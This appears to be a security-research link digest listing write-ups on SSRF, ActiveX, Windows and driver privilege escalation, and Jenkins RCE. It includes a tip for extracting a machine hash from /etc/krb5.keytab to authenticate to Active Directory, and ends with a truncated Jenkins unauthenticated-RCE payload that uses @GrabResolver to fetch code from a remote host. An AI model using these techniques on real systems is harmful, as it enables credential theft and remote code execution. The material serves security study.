Exploiting SSRF in AWS Elastic Beanstalk
https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/
In this blog, Sunil Yadav, our lead trainer for the "Advanced Web Hacking" training class, will discuss a case study where a Server-Side Request Forgery (SSRF) vulnerability was identified and exploited
ActiveX Exploitation in 2019 :: Instantiation is not Scripting
https://srcincite.io/blog/2019/02/01/activex-exploitation-in-2018-instantiation-is-not-scripting.html
Extracting hard-coded credentials using managed code debugging techniques in Windbg (2012)
http://www.exploit-monday.com/2012/05/extracting-hard-coded-credentials-using.html
tl;dr version Using some simple managed code debugging techniques, you can easily pull out hard-coded credentials from a binary claiming t...
Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation for Local Elevation of Privilege
https://googleprojectzero.blogspot.com/2018/08/windows-exploitation-tricks-exploiting.html
Posted by James Forshaw, Project Zero. And we’re back again for another blog in my series on Windows Exploitation tricks. This time I’ll...
https://github.com/schutzwerk/CANalyzat0r
CANalyzat0r: A security analysis toolkit for proprietary car protocols
Got a root shell on a domain-joined Linux box? Stumbled on this PS script yesterday. Run this against /etc/krb5.keytab to extract the machine hash and authenticate to AD and run your favorite enum tools :)
https://gist.github.com/0xhexmex/2ac1dee8a13b86668cfa7b849c52b210
Parses Kerberos Keytab files
CVE-2019-8372: Local Privilege Elevation in LG Kernel Driver
http://www.jackson-t.ca/lg-driver-lpe.html
Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
Jenkins Unauth RCE
/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='tld', root='http://[]/')%0a
@Grab(group='', module='poc', version='1')%0a
import rn;